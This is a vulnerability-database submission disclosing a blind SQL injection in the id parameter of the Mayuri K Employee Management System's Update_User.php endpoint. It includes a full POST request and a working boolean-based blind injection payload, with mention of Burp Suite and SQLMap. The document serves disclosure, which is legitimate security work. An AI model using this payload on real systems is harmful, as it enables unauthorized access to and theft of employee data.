Submit #494725: mayuri_k Web 1 SQL Injectioninfo

Titlemayuri_k Web 1 SQL Injection
DescriptionExploit Title: SQL Injection Vulnerability in Employee Management System Date: 04/02/2025 Exploit Author: Xcode0x Twitter: @xcode0x Vendor Homepage: [www.mayurik.com] Software Link: [Not provided] Version: v1.0 Tested on: Kali Linux SQL Injection Details: The web application is vulnerable to a blind SQL injection on the endpoint /hr_soft/admin/Update_User.php. By injecting SQL payloads into the id parameter, attackers can execute arbitrary SQL commands on the database, potentially extracting sensitive information or gaining unauthorized access to the system. Endpoint: POST /hr_soft/admin/Update_User.php Example Vulnerable Request: http Copy Edit POST /hr_soft/admin/Update_User.php HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Origin: http://x.x.x.x Connection: keep-alive Referer: http://x.x.x.x/hr_soft/admin/View_user.php Cookie: PHPSESSID=07e2sedv7t9ac46ep6u7iu2kng Upgrade-Insecure-Requests: 1 Priority: u=0, i id=69' RLIKE (SELECT (CASE WHEN (4038=4038) THEN 69 ELSE 0x28 END)) AND 'cKHc'='cKHc Proof of Concept (POC): Send the payload id=69' RLIKE (SELECT (CASE WHEN (4038=4038) THEN 69 ELSE 0x28 END)) AND 'cKHc'='cKHc in the id parameter using a tool like Burp Suite or manually via SQLMap. The server confirms the payload execution without errors, indicating a successful SQL injection vulnerability.
User
 xcode0x (UID 39076)
Submission02/04/2025 10:21 AM (4 months ago)
Moderation02/10/2025 09:54 AM (6 days later)
StatusAccepted
VulDB Entry295070 [Mayuri K Employee Management System up to 192.168.70.3 Update_User.php ID sql injection]
Points16

Do you need the next level of professionalism?

Upgrade your account now!